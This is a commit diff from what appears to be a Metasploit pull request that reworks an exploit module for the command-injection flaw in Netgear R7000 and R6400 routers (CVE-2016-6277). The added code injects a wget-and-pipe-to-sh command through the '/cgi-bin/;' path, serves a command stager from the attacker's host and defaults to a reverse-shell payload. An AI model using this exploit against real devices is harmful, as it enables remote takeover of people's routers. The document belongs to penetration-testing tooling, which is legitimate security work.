Merge pull request #1 from wvu-r7/pr/7968

Convert to CmdStager for R7000 exploit
bug/bundler_fix
Carter 2017-03-08 09:09:47 -05:00 committed by GitHub
commit fbf7f55485
1 changed files with 33 additions and 27 deletions

View File

@ -6,9 +6,11 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -18,11 +20,11 @@ class MetasploitModule < Msf::Exploit::Remote
Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
},
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Platform' => 'linux',
'Author' => ['thecarterb', 'Acew0rm'],
'DefaultTarget' => 0,
'Privileged' => false,
'Arch' => [ARCH_CMD],
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'Targets' => [
[ 'Automatic Target', { } ]
],
@ -35,20 +37,19 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'CVE', '2016-6277']
],
'DisclosureDate' => 'Dec 06 2016',
'Payload' =>
'DefaultOptions' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x20"
},
'DefaultOptions' => { 'WfsDelay' => 10}
'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
}
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
deregister_options('URIPATH')
end
def scrape(text, start_trig, end_trig)
text[/#{start_trig}(.*?)#{end_trig}/m, 1]
@ -80,24 +81,29 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
check
return if check == CheckCode::Safe
pe = payload.encoded
pe.to_s
pe.gsub!('{','')
pe.gsub!('}','')
#cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
#str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
print_status('Sending encoded command...')
vprint_status("Encoded command: #{pe}")
send_request_cgi({
'uri' => "/cgi-bin/;#{pe}",
'method' => 'GET'
})
print_status('Giving the handler time to run...')
@cmdstager = generate_cmdstager(flavor: :wget).join(';')
send_request_cgi(
'method' => 'GET',
'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
)
end
# Return CmdStager on first request, payload on second
def on_request_uri(cli, request)
if @cmdstager
send_response(cli, @cmdstager)
@cmdstager = nil
else
super
end
end
# XXX: This is the only way to force this resource
def resource_uri
'/'
end
end